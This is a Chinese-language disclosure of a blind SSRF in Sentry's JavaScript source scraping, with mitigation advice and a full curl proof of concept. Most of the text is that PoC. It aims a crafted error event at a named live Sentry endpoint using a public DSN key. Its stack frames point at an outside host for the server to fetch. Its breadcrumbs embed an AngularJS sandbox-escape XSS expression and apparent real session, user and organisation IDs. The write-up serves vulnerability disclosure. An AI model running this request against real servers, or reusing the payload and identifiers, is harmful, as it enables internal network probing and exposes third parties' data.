Sentry是一个实时的事件日志和聚合平台,基于 Django 构建。
漏洞详情:
由于 Sentry 默认开启 JavaScript 源码抓取(source code scraping):服务端在处理上报的 JS 错误事件时,会主动去拉取事件中引用的脚本 URL(推测为 stacktrace 各 frame 的 `filename` 字段,需结合被测 Sentry 版本确认)。攻击者因此可以让 Sentry 服务器向任意 URL 发起请求,形成 blind SSRF:攻击者看不到被请求 URL 的响应内容,只能通过带外方式(自己可控的外部主机,或内网服务是否被访问)观察请求是否发生,并借此探测 Sentry 所在内网的服务。这里的"未经授权"指不需要 Sentry 账号,但上报接口仍然需要目标项目的公开 DSN key(即 POC 中 URL 里的 `sentry_key` 参数),该 key 通常直接嵌在目标站点的前端 JS 中。缓解措施:在 Sentry 的项目/组织设置中关闭 JavaScript 源码抓取,并限制 Sentry 服务器向内网地址段的出站访问。
POC:
```
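# Proof of concept: submit a crafted JavaScript error event to the Sentry
# "store" endpoint of the target (HackerOne's Sentry instance, project 30).
# With JavaScript source fetching ("source code scraping", on by default at
# the time of the report) enabled, the Sentry server itself fetches script
# URLs referenced by the event (presumably the stacktrace frames' `filename`
# values -- confirm against the Sentry version under test), which is what
# turns an event upload into a blind SSRF from the Sentry host.
#
# Notes for anyone re-running this:
# - The endpoint needs no Sentry account, but `sentry_key` in the URL must be
#   the target project's valid public DSN key; that key is typically embedded
#   in the target site's client-side JS (the original client was raven-js).
# - The SSRF is blind: the response shown by curl is Sentry's own reply, not
#   the body of the fetched URL. The fetch has to be observed out of band.
# - The JSON body must stay on a single line: raw newlines inside a JSON
#   string are invalid and a strict parser rejects the whole event.
# - Content-Length is deliberately not set by hand; curl computes it from the
#   actual body. The original request hard-coded 9031, which silently breaks
#   the request as soon as any part of the payload is edited.
# - `-k` disables TLS certificate verification. It is not needed against a
#   public target with a valid certificate and would mask a MITM; keep it
#   only for a self-hosted test instance with a self-signed cert.
# - Content-Type is kept as in the original report.
curl -i -s -k -X $'POST' \
-H $'Host: errors.hackerone.net' \
-H $'Connection: close' \
-H $'Origin: https://hackerone.com' \
-H $'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36' \
-H $'Content-Type: application/csp-report' \
-H $'Accept: */*' \
-H $'Accept-Encoding: gzip, deflate' \
-H $'Accept-Language: ru-RU,ru;q=0.9,en-US;q=0.8,en;q=0.7' \
--data-binary $'{\"project\":\"30\",\"logger\":\"javascript\",\"platform\":\"javascript\",\"request\":{\"headers\":{\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36\",\"Referer\":\"https://avtohanter.ru/Business/Contractors/ContractorInfo?sessionid=40030075&id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c\"},\"url\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\"},\"exception\":{\"values\":[{\"type\":\"Error\",\"value\":\"Trying to get control scope but angular isn\'t ready yet or something like this\",\"stacktrace\":{\"frames\":[{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":110,\"colno\":81071,\"function\":\"XMLHttpRequest.o\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":75069,\"function\":\"XMLHttpRequest.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":71510,\"function\":\"k\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":23681,\"function\":\"Object.fireWith [as resolveWith]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js\",\"lineno\":96,\"colno\":22924,\"function\":\"s\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":724721,\"function\":\"Object.n.(anonymous function) [as success]\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725795,\"function\":\"Object.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":757703,\"function\":\"Object.executeInContext\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":725917,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js\",\"lineno\":1,\"colno\":723970,\"function\":\"c.json.c.toLowerCase.n.success.n.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075\",\"lineno\":2446,\"colno\":299,\"function\":\"ajaxOptions.success\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":313620,\"function\":\"NotificationCenter.<anonymous>\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":316137,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":542056,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":665829,\"function\":\"NotificationCenterDropdown.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666057,\"function\":\"NotificationCenterDropdown._scatter\",\"in_app\":true},{\"filename\":\"<anonymous>\",\"lineno\":null,\"colno\":null,\"function\":\"Array.forEach\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":666079,\"function\":\"?\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":714602,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":713050,\"function\":\"ListClientBinding.output\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":448313,\"function\":\"NotificationCenterOuterList.setValue\",\"in_app\":true},{\"filename\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"lineno\":1,\"colno\":683081,\"function\":\"NotificationCenterOuterList.getScope\",\"in_app\":true}]}}]},\"transaction\":\"https://avtohanter.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js\",\"trimHeadFrames\":0,\"tags\":{\"AbonentId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"UserId\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\",\"OrganizationId\":\"c344ad73-f374-4bef-8629-8ebe1ebea57e\"},\"extra\":{\"session:duration\":357},\"breadcrumbs\":{\"values\":[{\"timestamp\":1530367897.368,\"category\":\"sentry\",\"message\":\"$parse:lexerr: Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\",\"event_id\":\"57575ae92ea2477d8ba3665017601f81\",\"level\":\"error\"},{\"timestamp\":1530367897.373,\"message\":\"Error: [$parse:lexerr] Lexer Error: Unterminated quote at columns 47-67 [\'x=1} } };alert(1));] in expression [\'a\'.constructor.prototype.charAt=[].join;$eval(\'x=1} } };alert(1));].\\nhttp://errors.angularjs.org/1.5.8/$parse/lexerr?p0=Unterminated%20quote&p1=s%2047-67%20%5B\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B%5D&p2=\'a\'.constructor.prototype.charAt%3D%5B%5D.join%3B%24eval(\'x%3D1%7D%20%7D%20%7D%3Balert(1))%3B\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:365\\n at hr.throwError (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:75995)\\n at hr.readString (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:77352)\\n at hr.lex (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:74150)\\n at vr.ast (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:80676)\\n at Er.compile (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:85908)\\n at Or.parse (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:100573)\\n at c (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:101408)\\n at p (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:63437)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42036\\n at oe (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:42291)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40233)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ne (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:40404)\\n at ee (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:39604)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9411\\n at c.$eval (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111066)\\n at c.$apply (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:111299)\\n at https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9371\\n at Object.invoke (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:24205)\\n at o (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9292)\\n at Object.xe [as bootstrap] (https://elba.kontur.ru/dist/vendor.bundle.eec570ee672e4b47c7a2.js:58:9579)\\n at Object.bootstrap (https://elba.kontur.ru/dist/commons.bundle.a2d5b6c7d2ffda1c006f.js:1:633795)\\n at Function.run (https://elba.kontur.ru/dist/PrimaryMaster.bundle.7991fcfb2a87637dbcc8.js:1:38538)\\n at https://elba.kontur.ru/Business/Contractors/EditContractor?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionId=40030075:3511:21 undefined\",\"level\":\"error\",\"category\":\"console\"},{\"timestamp\":1530367897.415,\"category\":\"sentry\",\"message\":\"Error: Trying to get control scope but angular isn\'t ready yet or something like this\",\"event_id\":\"2da3183f684d4236b845f3b980c8fabe\",\"level\":\"error\"},{\"timestamp\":1530367897.455,\"category\":\"ui.click\",\"message\":\"input#ContractorRequisitesEdit_ContractorShortName_Input.c-input.c-input_elastic[type=\\\"text\\\"]\"},{\"timestamp\":1530367897.54,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"POST\",\"url\":\"https://elba.kontur.ru/Support/PortalAuth/SetPortalAuthCookie?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075\",\"status_code\":200}},{\"timestamp\":1530367897.577,\"type\":\"http\",\"category\":\"xhr\",\"data\":{\"method\":\"GET\",\"url\":\"https://elba.kontur.ru/Notices/NotificationCenter/GetViewData?id=da89ae9a-b2b7-4412-a5b0-6764f0c6556c&sessionid=40030075&_=1530367897217\",\"status_code\":200}}]},\"user\":{\"id\":\"36053ca1-a898-43e3-90be-2bf69232bcf0\"},\"release\":\"mobile_analitcs_redirect_fix e1293c0084a3\",\"event_id\":\"64eaf55f0b6942f6949d0ae00b4e002v\"}' \
$'https://errors.hackerone.net/api/30/store/?sentry_version=7&sentry_client=raven-js%2F3.25.2&sentry_key=61c1e2f50d21487c97a071737701f598'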
```